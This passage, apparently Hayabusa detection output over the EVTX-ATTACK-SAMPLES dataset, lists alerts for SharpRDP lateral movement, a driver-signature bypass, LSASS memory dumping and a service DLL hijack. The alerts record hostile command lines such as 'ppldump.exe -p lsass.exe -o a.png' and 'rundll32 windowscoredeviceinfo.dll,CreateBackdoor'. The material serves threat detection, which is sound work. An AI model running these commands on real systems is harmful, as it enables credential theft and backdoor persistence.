747F3D96-EF6D-5E29-0000-0010A243F100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: 
C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image 
Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: 
SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | 
LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
